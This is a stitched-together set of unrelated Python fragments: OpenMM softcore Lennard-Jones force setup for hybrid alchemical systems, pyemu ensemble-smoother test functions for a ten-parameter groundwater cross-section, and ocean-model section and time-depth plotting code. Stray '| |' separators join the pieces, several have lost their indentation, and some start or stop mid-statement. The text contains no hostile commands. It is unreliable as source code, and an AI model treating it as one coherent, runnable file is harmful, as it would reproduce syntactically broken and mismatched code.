        standard_nonbonded_force.setCutoffDistance(r_cutoff)
    else:
        raise Exception("Nonbonded method %s not supported yet." % str(self._nonbonded_method))
    standard_nonbonded_force.setNonbondedMethod(self._nonbonded_method)
    _logger.info(f"\t_add_nonbonded_force_terms: {self._nonbonded_method} added to standard nonbonded force")
    # assemble the full custom expression: per-method part + common softcore part + mixing rules
    sterics_energy_expression += self._nonbonded_custom_sterics_common()
    sterics_mixing_rules = self._nonbonded_custom_mixing_rules()
    custom_nonbonded_method = self._translate_nonbonded_method_to_custom(self._nonbonded_method)
    total_sterics_energy = "U_sterics;" + sterics_energy_expression + sterics_mixing_rules
    if self._has_functions:
        try:
            total_sterics_energy += 'lambda_sterics = ' + self._functions['lambda_sterics']
        except KeyError as e:
            print("Functions were provided, but there is no entry for sterics")
            raise e
    sterics_custom_nonbonded_force = openmm.CustomNonbondedForce(total_sterics_energy)
    # choose which softcore alpha to expose depending on the LJ softcore flavor
    if self._softcore_LJ_v2:
        sterics_custom_nonbonded_force.addGlobalParameter("softcore_alpha", self._softcore_LJ_v2_alpha)
    else:
        sterics_custom_nonbonded_force.addGlobalParameter("softcore_alpha", self.softcore_alpha)
    # per-particle parameter order defines the parameter indices -- keep it stable
    sterics_custom_nonbonded_force.addPerParticleParameter("sigmaA") # Lennard-Jones sigma initial
    sterics_custom_nonbonded_force.addPerParticleParameter("epsilonA") # Lennard-Jones epsilon initial
    sterics_custom_nonbonded_force.addPerParticleParameter("sigmaB") # Lennard-Jones sigma final
    sterics_custom_nonbonded_force.addPerParticleParameter("epsilonB") # Lennard-Jones epsilon final
    sterics_custom_nonbonded_force.addPerParticleParameter("unique_old") # 1 = hybrid old atom, 0 otherwise
    sterics_custom_nonbonded_force.addPerParticleParameter("unique_new") # 1 = hybrid new atom, 0 otherwise
    if self._has_functions:
        sterics_custom_nonbonded_force.addGlobalParameter('lambda', 0.0)
        sterics_custom_nonbonded_force.addEnergyParameterDerivative('lambda')
    else:
        sterics_custom_nonbonded_force.addGlobalParameter("lambda_sterics_core", 0.0)
        sterics_custom_nonbonded_force.addGlobalParameter("lambda_electrostatics_core", 0.0)
        sterics_custom_nonbonded_force.addGlobalParameter("lambda_sterics_insert", 0.0)
        sterics_custom_nonbonded_force.addGlobalParameter("lambda_sterics_delete", 0.0)
    sterics_custom_nonbonded_force.setNonbondedMethod(custom_nonbonded_method)
    _logger.info(f"\t_add_nonbonded_force_terms: {custom_nonbonded_method} added to sterics_custom_nonbonded force")
    self._hybrid_system.addForce(sterics_custom_nonbonded_force)
    self._hybrid_system_forces['core_sterics_force'] = sterics_custom_nonbonded_force
    _logger.info(f"\t_add_nonbonded_force_terms: {sterics_custom_nonbonded_force} added to hybrid system")
    #set the use of dispersion correction to be the same between the new nonbonded force and the old one:
    #these will be ignored from the _logger for the time being
    if self._old_system_forces['NonbondedForce'].getUseDispersionCorrection():
        self._hybrid_system_forces['standard_nonbonded_force'].setUseDispersionCorrection(True)
        # the custom force's long-range correction is gated by its own flag
        if self._use_dispersion_correction:
            sterics_custom_nonbonded_force.setUseLongRangeCorrection(True)
    else:
        self._hybrid_system_forces['standard_nonbonded_force'].setUseDispersionCorrection(False)
    # mirror the switching-function settings of the old system on both forces
    if self._old_system_forces['NonbondedForce'].getUseSwitchingFunction():
        switching_distance = self._old_system_forces['NonbondedForce'].getSwitchingDistance()
        standard_nonbonded_force.setUseSwitchingFunction(True)
        standard_nonbonded_force.setSwitchingDistance(switching_distance)
        sterics_custom_nonbonded_force.setUseSwitchingFunction(True)
        sterics_custom_nonbonded_force.setSwitchingDistance(switching_distance)
    else:
        standard_nonbonded_force.setUseSwitchingFunction(False)
        sterics_custom_nonbonded_force.setUseSwitchingFunction(False)
def _nonbonded_custom_sterics_common(self):
"""
Get a custom sterics expression using amber softcore expression
Returns
-------
sterics_addition : str
The common softcore sterics energy expression
"""
sterics_addition = "epsilon = (1-lambda_sterics)*epsilonA + lambda_sterics*epsilonB;" #interpolation
sterics_addition += "reff_sterics = sigma*((softcore_alpha*lambda_alpha + (r/sigma)^6))^(1/6);" # effective softcore distance for sterics
sterics_addition += "sigma = (1-lambda_sterics)*sigmaA + lambda_sterics*sigmaB;"
sterics_addition += "lambda_alpha = new_interaction*(1-lambda_sterics_insert) + old_interaction*lambda_sterics_delete;"
sterics_addition += "lambda_sterics = core_interaction*lambda_sterics_core + new_interaction*lambda_sterics_insert + old_interaction*lambda_sterics_delete;"
sterics_addition += "core_interaction = delta(unique_old1+unique_old2+unique_new1+unique_new2);new_interaction = max(unique_new1, unique_new2);old_interaction = max(unique_old1, unique_old2);"
return sterics_addition
def _nonbonded_custom(self, v2):
"""
Get a part of the nonbonded energy expression when there is no cutoff.
Returns
-------
sterics_energy_expression : str
The energy expression for U_sterics
electrostatics_energy_expression : str
The energy expression for electrostatics
"""
# soft-core Lennard-Jones
if v2:
sterics_energy_expression = "U_sterics = select(step(r - r_LJ), 4*epsilon*x*(x-1.0), U_sterics_quad);"
sterics_energy_expression += f"U_sterics_quad = Force*(((r - r_LJ)^2)/2 - (r - r_LJ)) + U_sterics_cut;"
sterics_energy_expression += f"U_sterics_cut = 4*epsilon*((sigma/r_LJ)^6)*(((sigma/r_LJ)^6) - 1.0);"
sterics_energy_expression += f"Force = -4*epsilon*((-12*sigma^12)/(r_LJ^13) + (6*sigma^6)/(r_LJ^7));"
sterics_energy_expression += f"x = (sigma/r)^6;"
sterics_energy_expression += f"r_LJ = softcore_alpha*((26/7)*(sigma^6)*lambda_sterics_deprecated)^(1/6);"
sterics_energy_expression += f"lambda_sterics_deprecated = new_interaction*(1.0 - lambda_sterics_insert) + old_interaction*lambda_sterics_delete;"
else:
sterics_energy_expression = "U_sterics = 4*epsilon*x*(x-1.0); x = (sigma/reff_sterics)^6;"
return sterics_energy_expression
def _nonbonded_custom_mixing_rules(self):
"""
Mixing rules for the custom nonbonded force.
Returns
-------
sterics_mixing_rules : str
The mixing expression for sterics
electrostatics_mixing_rules : str
The mixiing rules for electrostatics
"""
# Define mixing rules.
sterics_mixing_rules = "epsilonA = sqrt(epsilonA1*epsilonA2);" # mixing rule for | |
[os.remove(csv_file) for csv_file in csv_files]
pst = pyemu.Pst("10par_xsec.pst")
par = pst.parameter_data
par.loc["stage", "partrans"] = "fixed"
v = pyemu.utils.ExpVario(contribution=0.25, a=60.0)
gs = pyemu.utils.GeoStruct(variograms=[v], transform="log")
par = pst.parameter_data
k_names = par.loc[par.parnme.apply(lambda x: x.startswith('k')), "parnme"]
sr = flopy.utils.SpatialReference(delc=[10], delr=np.zeros((10)) + 10.0)
cov = gs.covariance_matrix(sr.xcentergrid[0, :], sr.ycentergrid[0, :], k_names)
obs = pst.observation_data
obs.loc["h01_09", "weight"] = 100.0
obs.loc["h01_09", 'obgnme'] = "lt_test"
obs.loc["h01_09", 'obsval'] = 2.0
es = pyemu.EnsembleSmoother(pst, parcov=cov,
num_slaves=10, port=4005, verbose=True,
drop_bad_reals=14000.)
lz = es.get_localizer().to_dataframe()
# the k pars upgrad of h01_04 and h01_06 are localized
upgrad_pars = [pname for pname in lz.columns if "_" in pname and \
int(pname.split('_')[1]) > 4]
lz.loc["h01_04", upgrad_pars] = 0.0
upgrad_pars = [pname for pname in lz.columns if '_' in pname and \
int(pname.split('_')[1]) > 6]
lz.loc["h01_06", upgrad_pars] = 0.0
lz = pyemu.Matrix.from_dataframe(lz).T
es.initialize(parensemble="10par_xsec.pe.bak",obsensemble="10par_xsec.oe.bak",
restart_obsensemble="10par_xsec.oe.restart.bak",init_lambda=10000.0)
# just for force full upgrade testing for
es.iter_num = 2
es.update(lambda_mults=[.1, 1000.0],calc_only=True,use_approx=False,localizer=lz)
#obj = pd.read_csv("10par_xsec.pst.iobj.csv")
#obj_act = pd.read_csv("10par_xsec.pst.iobj.actual.csv")
upgrade = pd.read_csv("10par_xsec.pst.upgrade_1.0003.csv")
os.chdir(os.path.join("..", ".."))
# for b,n in zip([bak_obj,bak_obj_act,bak_upgrade],[obj,obj_act,upgrade]):
# print(b,n)
# d = b - n
# print(d.max(),d.min())
d = (bak_upgrade - upgrade).apply(np.abs)
assert d.max().max() < 1.0e-6
def tenpar_fixed():
    """Smoother run on the 10-par cross section with the 'stage' parameter fixed."""
    import os
    import numpy as np
    import flopy
    import pyemu
    os.chdir(os.path.join("smoother", "10par_xsec"))
    # clear results left over from any previous run
    for leftover in [f for f in os.listdir('.') if f.endswith(".csv")]:
        os.remove(leftover)
    pst = pyemu.Pst("10par_xsec.pst")
    pst.parameter_data.loc["stage", "partrans"] = "fixed"
    # geostatistical prior for the k parameters
    variogram = pyemu.utils.ExpVario(contribution=0.25, a=60.0)
    geostruct = pyemu.utils.GeoStruct(variograms=[variogram], transform="log")
    par = pst.parameter_data
    k_names = par.loc[par.parnme.apply(lambda nm: nm.startswith('k')), "parnme"]
    sr = flopy.utils.SpatialReference(delc=[10], delr=np.zeros((10)) + 10.0)
    cov = geostruct.covariance_matrix(sr.xcentergrid[0, :], sr.ycentergrid[0, :], k_names)
    es = pyemu.EnsembleSmoother(pst, parcov=cov,
                                num_slaves=10, port=4005, verbose=True,
                                drop_bad_reals=14000.)
    lz = es.get_localizer().to_dataframe()
    # localization: zero out the k pars upgradient of h01_04 and h01_06
    for obs_name, column in (("h01_04", 4), ("h01_06", 6)):
        upgrad_pars = [pname for pname in lz.columns
                       if "_" in pname and int(pname.split('_')[1]) > column]
        lz.loc[obs_name, upgrad_pars] = 0.0
    lz = pyemu.Matrix.from_dataframe(lz).T
    print(lz)
    es.initialize(num_reals=100, init_lambda=10000.0)
    for _ in range(1):
        es.update(lambda_mults=[.1, 1000.0])
    os.chdir(os.path.join("..", ".."))
def tenpar():
    """Basic smoother run on the 10-par cross-section problem."""
    import os
    import numpy as np
    import flopy
    import pyemu
    os.chdir(os.path.join("smoother", "10par_xsec"))
    # clear results left over from any previous run
    for leftover in [f for f in os.listdir('.') if f.endswith(".csv")]:
        os.remove(leftover)
    pst = pyemu.Pst("10par_xsec.pst")
    dia_parcov = pyemu.Cov.from_parameter_data(pst, sigma_range=6.0)
    # geostatistical prior block for the k parameters
    variogram = pyemu.utils.ExpVario(contribution=0.25, a=60.0)
    geostruct = pyemu.utils.GeoStruct(variograms=[variogram], transform="log")
    par = pst.parameter_data
    k_names = par.loc[par.parnme.apply(lambda nm: nm.startswith('k')), "parnme"]
    sr = flopy.utils.SpatialReference(delc=[10], delr=np.zeros((10)) + 10.0)
    full_cov = geostruct.covariance_matrix(sr.xcentergrid[0, :], sr.ycentergrid[0, :], k_names)
    # replace the diagonal k entries with the full geostatistical block
    dia_parcov.drop(list(k_names), axis=1)
    cov = dia_parcov.extend(full_cov)
    es = pyemu.EnsembleSmoother("10par_xsec.pst", parcov=cov,
                                num_slaves=10, port=4005, verbose=True,
                                drop_bad_reals=14000.)
    lz = es.get_localizer().to_dataframe()
    # localization: zero out the k pars upgradient of h01_04 and h01_06
    for obs_name, column in (("h01_04", 4), ("h01_06", 6)):
        upgrad_pars = [pname for pname in lz.columns
                       if "_" in pname and int(pname.split('_')[1]) > column]
        lz.loc[obs_name, upgrad_pars] = 0.0
    lz = pyemu.Matrix.from_dataframe(lz).T
    print(lz)
    es.initialize(num_reals=100, init_lambda=10000.0)
    for _ in range(1):
        es.update(lambda_mults=[.1, 1000.0])
    os.chdir(os.path.join("..", ".."))
def tenpar_opt():
    """Run paired base vs constrained smoother tests on the 10par_xsec model.

    First runs a version where observation h01_09 is re-weighted into an
    'lt_test' (less-than) constraint group ("10par_xsec_opt.pst"), then
    re-runs the unmodified base case with the same starting ensembles, and
    finally plots a histogram comparison of the two final observation
    ensembles for each observation.
    """
    import os
    import numpy as np
    import pandas as pd
    import matplotlib.pyplot as plt
    import flopy
    import pyemu
    os.chdir(os.path.join("smoother", "10par_xsec"))
    # clear results from any previous run; plain loop since os.remove is
    # called only for its side effect
    for csv_file in [f for f in os.listdir('.') if f.endswith(".csv")]:
        os.remove(csv_file)
    pst = pyemu.Pst("10par_xsec.pst")
    dia_parcov = pyemu.Cov.from_parameter_data(pst, sigma_range=6.0)
    v = pyemu.utils.ExpVario(contribution=0.25, a=60.0)
    gs = pyemu.utils.GeoStruct(variograms=[v], transform="log")
    par = pst.parameter_data
    k_names = par.loc[par.parnme.apply(lambda x: x.startswith('k')), "parnme"]
    sr = flopy.utils.SpatialReference(delc=[10], delr=np.zeros(10) + 10.0)
    full_cov = gs.covariance_matrix(sr.xcentergrid[0, :], sr.ycentergrid[0, :], k_names)
    dia_parcov.drop(list(k_names), axis=1)
    cov = dia_parcov.extend(full_cov)
    obs = pst.observation_data
    # treat h01_09 as a heavily weighted less-than constraint observation
    obs.loc["h01_09", "weight"] = 100.0
    obs.loc["h01_09", "obgnme"] = "lt_test"
    obs.loc["h01_09", "obsval"] = 2.0
    print(obs)
    pst.write("10par_xsec_opt.pst")
    pst.write(os.path.join("template", "10par_xsec_opt.pst"))
    es = pyemu.EnsembleSmoother("10par_xsec_opt.pst", parcov=cov,
                                num_slaves=10, port=4005, verbose=True)
    # localizer: zero the k pars upgradient of h01_04 and h01_06
    lz = es.get_localizer().to_dataframe()
    upgrad_pars = [pname for pname in lz.columns if "_" in pname and
                   int(pname.split('_')[1]) > 4]
    lz.loc["h01_04", upgrad_pars] = 0.0
    upgrad_pars = [pname for pname in lz.columns if '_' in pname and
                   int(pname.split('_')[1]) > 6]
    lz.loc["h01_06", upgrad_pars] = 0.0
    lz = pyemu.Matrix.from_dataframe(lz).T
    print(lz)
    # draw one set of starting ensembles so both runs are directly comparable
    mc = pyemu.MonteCarlo(pst=pst, parcov=cov)
    mc.draw(300, obs=True)
    es.initialize(parensemble=mc.parensemble, obsensemble=mc.obsensemble, init_lambda=10000.0)
    niter = 20
    for it in range(niter):
        es.update(lambda_mults=[.1, 1.0, 10.0], run_subset=30)
    oe_ieq = pd.read_csv("10par_xsec_opt.pst.obsensemble.{0:04d}.csv".format(niter))
    # rerun the unmodified base case from the same starting ensembles
    es = pyemu.EnsembleSmoother("10par_xsec.pst", parcov=cov,
                                num_slaves=10, port=4005, verbose=True)
    lz = es.get_localizer().to_dataframe()
    upgrad_pars = [pname for pname in lz.columns if "_" in pname and
                   int(pname.split('_')[1]) > 4]
    lz.loc["h01_04", upgrad_pars] = 0.0
    upgrad_pars = [pname for pname in lz.columns if '_' in pname and
                   int(pname.split('_')[1]) > 6]
    lz.loc["h01_06", upgrad_pars] = 0.0
    lz = pyemu.Matrix.from_dataframe(lz).T
    print(lz)
    es.initialize(parensemble=mc.parensemble, obsensemble=mc.obsensemble, init_lambda=10000.0)
    for it in range(niter):
        es.update(lambda_mults=[.1, 1.0, 10.0], run_subset=30)
    oe_base = pd.read_csv("10par_xsec.pst.obsensemble.{0:04d}.csv".format(niter))
    # histogram comparison: base case (grey) vs constrained case (blue)
    for oname in obs.obsnme:
        ax = plt.subplot(111)
        oe_base.loc[:, oname].hist(bins=20, ax=ax, color="0.5", alpha=0.54)
        oe_ieq.loc[:, oname].hist(bins=20, ax=ax, color="b", alpha=0.5)
        ax.set_xlim(oe_ieq.loc[:, oname].min() * 0.75, oe_ieq.loc[:, oname].max() * 1.25)
        plt.savefig(oname + ".png")
        plt.close("all")
    os.chdir(os.path.join("..", ".."))
def plot_10par_opt_traj():
    """Plot ensemble trajectories across iterations into traj.pdf.

    Reads every per-iteration obs/par ensemble csv written by tenpar_opt()
    for both the base ("10par_xsec.pst") and constrained
    ("10par_xsec_opt.pst") cases and, for each observation and parameter,
    plots every realization's trajectory across iterations (base in grey,
    constrained in blue).
    """
    import os  # was missing: os.path.join/os.listdir are used below
    import numpy as np
    import pandas as pd
    from matplotlib.backends.backend_pdf import PdfPages
    import matplotlib.pyplot as plt
    import pyemu
    d = os.path.join("smoother", "10par_xsec")
    case1 = "10par_xsec.pst"
    case2 = "10par_xsec_opt.pst"
    # sort so the zero-padded iteration numbers in the file names put the
    # columns (and hence the plotted trajectories) in iteration order;
    # os.listdir order is arbitrary
    files = sorted(os.listdir(d))
    case1_oes = [pd.read_csv(os.path.join(d, f)) for f in files
                 if case1 in f and "obsensemble" in f]
    case2_oes = [pd.read_csv(os.path.join(d, f)) for f in files
                 if case2 in f and "obsensemble" in f]
    case1_pes = [pd.read_csv(os.path.join(d, f)) for f in files
                 if case1 in f and "parensemble" in f]
    case2_pes = [pd.read_csv(os.path.join(d, f)) for f in files
                 if case2 in f and "parensemble" in f]
    print(case1_oes)
    print(case2_oes)
    pst = pyemu.Pst(os.path.join(d, "10par_xsec.pst"))
    with PdfPages("traj.pdf") as pdf:
        for oname in pst.observation_data.obsnme:
            # one column per iteration, one row per realization
            df1 = pd.concat([c.loc[:, [oname]] for c in case1_oes], axis=1)
            df2 = pd.concat([c.loc[:, [oname]] for c in case2_oes], axis=1)
            df1.columns = np.arange(df1.shape[1])
            df2.columns = np.arange(df2.shape[1])
            fig = plt.figure(figsize=(10, 5))
            ax = plt.subplot(111)
            for i in df1.index:
                ax.plot(df1.columns, df1.loc[i, :], color='0.5', lw=0.2)
            for i in df2.index:
                ax.plot(df2.columns, df2.loc[i, :], color='b', lw=0.2)
            ax.set_title(oname)
            pdf.savefig()
            plt.close(fig)
        for pname in pst.parameter_data.parnme:
            df1 = pd.concat([c.loc[:, [pname]] for c in case1_pes], axis=1)
            df2 = pd.concat([c.loc[:, [pname]] for c in case2_pes], axis=1)
            df1.columns = np.arange(df1.shape[1])
            df2.columns = np.arange(df2.shape[1])
            fig = plt.figure(figsize=(10, 5))
            ax = plt.subplot(111)
            for i in df1.index:
                ax.plot(df1.columns, df1.loc[i, :], color='0.5', lw=0.2)
            for i in df2.index:
                ax.plot(df2.columns, df2.loc[i, :], color='b', lw=0.2)
            ax.set_title(pname)
            pdf.savefig()
            plt.close(fig)
def tenpar_restart():
    """Restart an EnsembleSmoother run on the 10par_xsec test from saved ensembles."""
    import os
    import numpy as np
    import flopy
    import pyemu
    os.chdir(os.path.join("smoother", "10par_xsec"))
    control = pyemu.Pst("10par_xsec.pst")
    diag_cov = pyemu.Cov.from_parameter_data(control, sigma_range=6.0)
    vario = pyemu.utils.ExpVario(contribution=0.25, a=60.0)
    geostruct = pyemu.utils.GeoStruct(variograms=[vario], transform="log")
    par_df = control.parameter_data
    knames = par_df.loc[par_df.parnme.apply(lambda n: n.startswith('k')), "parnme"]
    spat_ref = flopy.utils.SpatialReference(delc=[10], delr=np.zeros((10)) + 10.0)
    geo_cov = geostruct.covariance_matrix(spat_ref.xcentergrid[0, :],
                                          spat_ref.ycentergrid[0, :], knames)
    # swap the diagonal entries for the k pars with the geostatistical block
    diag_cov.drop(list(knames), axis=1)
    parcov = diag_cov.extend(geo_cov)
    smoother = pyemu.EnsembleSmoother("10par_xsec.pst", parcov=parcov,
                                      num_slaves=10, port=4005, verbose=True)
    # zero the localizer entries for k pars upgradient of h01_04 / h01_06
    loc_df = smoother.get_localizer().to_dataframe()
    for obs_name, cutoff in (("h01_04", 4), ("h01_06", 6)):
        masked = [p for p in loc_df.columns
                  if "_" in p and int(p.split('_')[1]) > cutoff]
        loc_df.loc[obs_name, masked] = 0.0
    loc_mat = pyemu.Matrix.from_dataframe(loc_df).T
    print(loc_mat)
    # resume from previously saved parameter/observation ensembles
    smoother.initialize(parensemble="par_start.csv", obsensemble="obs_start.csv",
                        restart_obsensemble="obs_restart.csv", init_lambda=10000.0)
    for _ in range(1):
        smoother.update(lambda_mults=[0.1, 1.0, 10.0], run_subset=30)
    os.chdir(os.path.join("..", ".."))
def tenpar_failed_runs():
    """Exercise the smoother's handling of failed model runs on 10par_xsec."""
    import os
    import numpy as np
    import pyemu
    os.chdir(os.path.join("smoother", "10par_xsec"))
    control = pyemu.Pst("10par_xsec.pst")
    diag_cov = pyemu.Cov.from_parameter_data(control, sigma_range=6.0)
    vario = pyemu.utils.ExpVario(contribution=0.25, a=60.0)
    geostruct = pyemu.utils.GeoStruct(variograms=[vario], transform="log")
    par_df = control.parameter_data
    knames = par_df.loc[par_df.parnme.apply(lambda n: n.startswith('k')), "parnme"]
    spat_ref = pyemu.utils.SpatialReference(delc=[10], delr=np.zeros((10)) + 10.0)
    geo_cov = geostruct.covariance_matrix(spat_ref.xcentergrid[0, :],
                                          spat_ref.ycentergrid[0, :], knames)
    # swap the diagonal entries for the k pars with the geostatistical block
    diag_cov.drop(list(knames), axis=1)
    parcov = diag_cov.extend(geo_cov)
    smoother = pyemu.EnsembleSmoother("10par_xsec.pst", parcov=parcov,
                                      num_slaves=2,
                                      verbose=True)
    # zero the localizer entries for k pars upgradient of h01_04 / h01_06
    loc_df = smoother.get_localizer().to_dataframe()
    for obs_name, cutoff in (("h01_04", 4), ("h01_06", 6)):
        masked = [p for p in loc_df.columns
                  if "_" in p and int(p.split('_')[1]) > cutoff]
        loc_df.loc[obs_name, masked] = 0.0
    loc_mat = pyemu.Matrix.from_dataframe(loc_df).T
    print(loc_mat)
    smoother.initialize(parensemble="par_start.csv", obsensemble="obs_start.csv")
    for _ in range(10):
        smoother.update(use_approx=False, lambda_mults=[0.1, 1.0, 10.0])
    os.chdir(os.path.join("..", ".."))
def tenpar_plot():
import os
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
import pandas as pd
from pyemu import Pst
d = os.path.join("smoother","10par_xsec")
pst = Pst(os.path.join(d,"10par_xsec.pst"))
plt_dir = os.path.join(d,"plot")
if not os.path.exists(plt_dir):
os.mkdir(plt_dir)
par_files = [os.path.join(d,f) for f in os.listdir(d) if "parensemble." in f
and ".png" not in f]
par_dfs = [pd.read_csv(par_file,index_col=0) for par_file in par_files]
par_names = list(par_dfs[0].columns)
#mx = (pst.parameter_data.loc[:,"parubnd"] * 1.1)
#mn = (pst.parameter_data.loc[:,"parlbnd"] * 0.9)
mx = max([pdf.max().max() for pdf in par_dfs])
num_reals_plot = 12
plot_rows = 2
plot_cols = 6
assert plot_rows * plot_cols == num_reals_plot
figsize = (20,10)
with PdfPages(os.path.join(plt_dir,"parensemble_reals.pdf")) as pdf:
for par_file,par_df in zip(par_files,par_dfs):
#print(par_file)
fig | |
if ignore is not None: maskedField1 = numpy.ma.masked_array(field1, mask=[field1==ignore])
else: maskedField1 = field1.copy()
yCoord, zCoord, field1 = m6toolbox.section2quadmesh(y, z, maskedField1)
# Diagnose statistics
yzWeighting = yzWeight(y, z)
s1Min, s1Max, s1Mean, s1Std, s1RMS = myStats(maskedField1, yzWeighting, debug=debug)
if ignore is not None: maskedField2 = numpy.ma.masked_array(field2, mask=[field2==ignore])
else: maskedField2 = field2.copy()
yCoord, zCoord, field2 = m6toolbox.section2quadmesh(y, z, maskedField2)
s2Min, s2Max, s2Mean, s2Std, s2RMS = myStats(maskedField2, yzWeighting, debug=debug)
dMin, dMax, dMean, dStd, dRMS = myStats(maskedField1 - maskedField2, yzWeighting, debug=debug)
dRxy = corr(maskedField1 - s1Mean, maskedField2 - s2Mean, yzWeighting)
s12Min = min(s1Min, s2Min); s12Max = max(s1Max, s2Max)
xLims = numpy.amin(yCoord), numpy.amax(yCoord); yLims = boundaryStats(zCoord)
if debug:
print('s1: min, max, mean =', s1Min, s1Max, s1Mean)
print('s2: min, max, mean =', s2Min, s2Max, s2Mean)
print('s12: min, max =', s12Min, s12Max)
# Choose colormap
if nbins is None and (clim is None or len(clim)==2): cBins=35
else: cBins=nbins
if nbins is None and (dlim is None or len(dlim)==2): nbins=35
if colormap is None: colormap = chooseColorMap(s12Min, s12Max)
cmap, norm, extend = chooseColorLevels(s12Min, s12Max, colormap, clim=clim, nbins=cBins, extend=extend)
if addplabel: preTitleA = 'A: '; preTitleB = 'B: '
else: preTitleA = ''; preTitleB = ''
if axis is None:
setFigureSize(aspect, resolution, npanels=npanels, debug=debug)
#plt.gcf().subplots_adjust(left=.13, right=.94, wspace=0, bottom=.05, top=.94, hspace=0.15)
if npanels in [2, 3]:
axis = plt.subplot(npanels,1,1)
plt.pcolormesh(yCoord, zCoord, field1, cmap=cmap, norm=norm)
if interactive: addStatusBar(yCoord, zCoord, field1)
cb1 = plt.colorbar(fraction=.08, pad=0.02, extend=extend)
if centerlabels and len(clim)>2: cb1.set_ticks( 0.5*(clim[:-1]+clim[1:]) )
axis.set_facecolor(landcolor)
if contour:
zz = 0.5 * ( z[:-1] + z[1:])
yy = 0.5 * ( y[:-1] + y[1:])
print(yy.shape, zz.shape, maskedField1.shape)
matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
cs = plt.contour(yy+0*zz, zz, maskedField1, colors='k')
plt.clabel(cs, fmt='%2.1f', fontsize=14)
if splitscale is not None:
for zzz in splitscale[1:-1]: plt.axhline(zzz,color='k',linestyle='--')
axis.set_yscale('splitscale', zval=splitscale)
plt.xlim( xLims ); plt.ylim( yLims )
annotateStats(axis, s1Min, s1Max, s1Mean, s1Std, s1RMS, webversion=webversion)
axis.set_xticklabels([''])
if len(zlabel+zunits)>0: plt.ylabel(label(zlabel, zunits))
if len(title1)>0: plt.title(preTitleA+title1)
axis = plt.subplot(npanels,1,2)
plt.pcolormesh(yCoord, zCoord, field2, cmap=cmap, norm=norm)
if interactive: addStatusBar(yCoord, zCoord, field2)
cb2 = plt.colorbar(fraction=.08, pad=0.02, extend=extend)
if contour:
cs = plt.contour(yy+0*zz, zz, maskedField2, colors='k')
plt.clabel(cs, fmt='%2.1f', fontsize=14)
if centerlabels and len(clim)>2: cb2.set_ticks( 0.5*(clim[:-1]+clim[1:]) )
axis.set_facecolor(landcolor)
if splitscale is not None:
for zzz in splitscale[1:-1]: plt.axhline(zzz,color='k',linestyle='--')
axis.set_yscale('splitscale', zval=splitscale)
plt.xlim( xLims ); plt.ylim( yLims )
annotateStats(axis, s2Min, s2Max, s2Mean, s2Std, s2RMS, webversion=webversion)
if npanels>2: axis.set_xticklabels([''])
if len(zlabel+zunits)>0: plt.ylabel(label(zlabel, zunits))
if len(title2)>0: plt.title(preTitleB+title2)
if npanels in [1, 3]:
axis = plt.subplot(npanels,1,npanels)
if dcolormap is None: dcolormap = chooseColorMap(dMin, dMax)
if dlim is None and dStd>0:
cmap, norm, dextend = chooseColorLevels(dMean-sigma*dStd, dMean+sigma*dStd, dcolormap, clim=dlim, nbins=nbins, extend='both', autocenter=True)
else:
cmap, norm, dextend = chooseColorLevels(dMin, dMax, dcolormap, clim=dlim, nbins=nbins, extend=dextend, autocenter=True)
plt.pcolormesh(yCoord, zCoord, field1 - field2, cmap=cmap, norm=norm)
if interactive: addStatusBar(yCoord, zCoord, field1 - field2)
cb3 = plt.colorbar(fraction=.08, pad=0.02, extend=dextend)
if centerdlabels and len(dlim)>2: cb3.set_ticks( 0.5*(dlim[:-1]+dlim[1:]) )
axis.set_facecolor(landcolor)
if splitscale is not None:
for zzz in splitscale[1:-1]: plt.axhline(zzz,color='k',linestyle='--')
axis.set_yscale('splitscale', zval=splitscale)
plt.xlim( xLims ); plt.ylim( yLims )
annotateStats(axis, dMin, dMax, dMean, dStd, dRMS)
if len(zlabel+zunits)>0: plt.ylabel(label(zlabel, zunits))
axis.annotate(' r(A,B)=%.5g\n'%(dRxy), xy=(1.0,-1.07), xycoords='axes fraction', verticalalignment='top', horizontalalignment='center', fontsize=10)
if len(ylabel+yunits)>0: plt.xlabel(label(ylabel, yunits))
if len(title3)>0: plt.title(title3)
if len(suptitle)>0: plt.suptitle(suptitle)
if save is not None: plt.savefig(save)
if interactive: addInteractiveCallbacks()
if show: plt.show(block=False)
def ztplot(field, t=None, z=None,
           tlabel=None, tunits=None, zlabel=None, zunits=None,
           splitscale=None,
           title='', suptitle='', autocenter=False,
           clim=None, colormap=None, extend=None, centerlabels=False,
           nbins=None, landcolor=[.5,.5,.5], contour=False,
           aspect=[16,9], resolution=576, axis=None,
           ignore=None, save=None, debug=False, show=False, interactive=False):
  """
  Renders a time-depth (Hovmoller-style) plot of scalar field, field(t,z).

  Arguments:
  field        Scalar 2D array to be plotted.
  t            t (or time) coordinate (1D array).
  z            z coordinate (1D array).
  tlabel       The label for the t axis. Default 'Time'.
  tunits       The units for the t axis. Default 'Years'.
  zlabel       The label for the z axis. Default 'Elevation'.
  zunits       The units for the z axis. Default 'm'.
  splitscale   A list of depths to define equal regions of projection in the vertical, e.g. [0.,-1000,-6500]
  title        The title to place at the top of the panel. Default ''.
  suptitle     The super-title to place at the top of the figure. Default ''.
  autocenter   If clim generated by script, set to be centered on zero. Default False.
  clim         A tuple of (min,max) color range OR a list of contour levels. Default None.
  colormap     The name of the colormap to use. Default None.
  extend       Can be one of 'both', 'neither', 'max', 'min'. Default None.
  centerlabels If True, will move the colorbar labels to the middle of the interval. Default False.
  nbins        The number of colors levels (used if clim is missing or only specifies the color range).
  landcolor    An rgb tuple to use for the color of land (no data). Default [.5,.5,.5].
  contour      If true, draw and label contour lines. Default is False.
  aspect       The aspect ratio of the figure, given as a tuple (W,H). Default [16,9].
  resolution   The vertical resolution of the figure given in pixels. Default 576.
  axis         The axis handle to plot to. Default None.
  ignore       A value to use as no-data (NaN). Default None.
  save         Name of file to save figure in. Default None.
  debug        If true, report stuff for debugging. Default False.
  show         If true, causes the figure to appear on screen. Used for testing. Default False.
  interactive  If true, adds interactive features such as zoom, close and cursor. Default False.
  """
  # Create coordinates/labels if not provided
  tlabel, tunits, zlabel, zunits = createTZlabels(t, z, tlabel, tunits, zlabel, zunits)
  if debug: print('t,z label/units=',tlabel,tunits,zlabel,zunits)
  # Mask out the no-data value, if one was given
  if ignore is not None: maskedField = numpy.ma.masked_array(field, mask=[field==ignore])
  else: maskedField = field.copy()
  # transpose so z runs along the first axis for pcolormesh(t, z, ...)
  field2 = maskedField.T
  tCoord = t; zCoord = z

  # Diagnose statistics (unweighted: second argument None)
